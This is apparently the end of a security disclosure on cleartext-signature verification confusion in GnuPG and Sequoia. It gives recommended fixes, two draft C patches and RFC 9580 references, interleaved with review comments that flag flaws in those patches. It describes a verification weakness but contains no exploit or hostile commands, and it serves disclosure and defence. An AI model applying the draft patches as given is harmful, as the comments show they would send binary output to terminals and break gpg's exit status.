Thank you

Best,
Liam

--------------------------------------------------------------------------

Recommended patches

Shared:

1. Phasing out cleartext signatures completely is suggested. This requires a new OpenPGP standard version and a deprecation period. Not possible until the disclosure deadline.

For GPG:

2. Only verify cleartext signatures if an explicit cleartext verification option is provided. Prevents confusion of the signature format. Verification could fail if an expected cleartext signature is malformed.

3. Always output the data that was actually verified, at least for cleartext signatures and One-Pass signatures. Might be problematic because of binary output and output limits.
   1. Alternatively, output a warning if the output option is not used.

For Sequoia:

2. Only verify the signature type specified on the command line. The user asks for cleartext -> give them cleartext or nothing.

GPG Option 2

Introduce a new command for verification of cleartext signatures. Accept cleartext signatures only if this command was used. In case no command is provided, the verified data is implicitly printed. Cleartext signatures can be accepted in this case because tampering should be visible in the output. Optionally, signature type detection could include cleartext signatures if an output option was specified. Separating cleartext signatures into a separate verification command makes deprecating this message type easier.

GPG Option 3

A default output file for verification can be set here.
STDOUT/STDERR might be dangerous due to binary output; other files are likely a bad default. This should be paired with asking users before printing binary output, skipping binary output, or printing it as hexadecimal.

diff --git a/g10/gpg.c b/g10/gpg.c index 99fe5b844..5f80c93e7 100644 --- a/g10/gpg.c +++ b/g10/gpg.c @@ -4698,6 +4698,8 @@ main (int argc, char **argv) break; case aVerify: + if (!opt.outfile) + opt.outfile = "-"; if (multifile) { if ((rc = verify_files (ctrl, argc, argv)))

GPG Option 3.1

Inform the user once about the dangers of verifying signatures without checking what was verified. Does not output a warning if an output was explicitly defined or was activated implicitly because no command was given.

diff --git a/g10/mainproc.c b/g10/mainproc.c index 8108a07b7..b73580f13 100644 --- a/g10/mainproc.c +++ b/g10/mainproc.c
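Review bot: in the gpg.c aVerify hunk above, opt.outfile = "-" makes every --verify write the signed data to stdout unconditionally, which is exactly the binary-to-terminal hazard the GPG Option 3 text says must be paired with a prompt, a skip or hex output, and nothing in the hunk provides that pairing; consider gating the default (for instance only when stdout is not a terminal, or only for literal data whose format octet marks it as text) and documenting that --verify's stdout now carries data, since callers that parse gpg's stdout would otherwise break. The condition also tests only opt.outfile, while the mainproc.c hunk treats opt.outfp as an output sink as well, so the two patches disagree on what "an output was set" means; check both here.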
@@ -234,6 +234,13 @@ add_signature (CTX c, PACKET *pkt) { kbnode_t node; + if (!c->any.sig_seen && !c->signed_data.used + && !(opt.outfp || opt.outfile || !c->sigs_only)) + { + log_error ("WARNING: Verified data might differ from assumed input,\n"); + log_error ("use --output to validate actual signed data."); + } + c->any.sig_seen = 1; if (pkt->pkttype == PKT_SIGNATURE && !c->list) {

Sequoia Verification Recommendations

Documentation, CLI and man page document separate verification options. However, (inline) message verification and cleartext verification are passed to the same handler internally. There should be separate builders and verifiers for both types, as this behaviour is security relevant. It is also what users would expect from the man page. Only the documentation declares that Sequoia tries to verify despite the type provided by the user.

References

* https://www.rfc-editor.org/rfc/rfc9580.html
* https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages
* https://www.rfc-editor.org/rfc/rfc9580.html#section-7
* https://www.rfc-editor.org/rfc/rfc9580.html#name-issues-with-the-cleartext-s
* https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo
* https://www.rfc-editor.org/rfc/rfc9580.html#name-one-pass-signature-packet-t
* https://www.rfc-editor.org/rfc/rfc9580.html#name-literal-data-packet-type-id
* https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2
* https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line
* https://www.gnupg.org/documentation/manuals/gnupg/Operational-GPG-Commands.html#:~:text=It%20is%20suggested%20to%20avoid%20cleartext%20signatures%20in%20favor%20of%20detached%20signatures.
* https://seclists.org/fulldisclosure/
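Review bot: in the mainproc.c add_signature hunk above, the warning goes through log_error, which is GnuPG's error-level logger and counts towards the error count that decides gpg's exit status, so a plain --verify without --output would report a good signature and still exit non-zero; an advisory message like this belongs in log_info. The second format string also lacks the trailing "\n" that the first one has and that GnuPG's log calls end with; fold both calls into a single newline-terminated message.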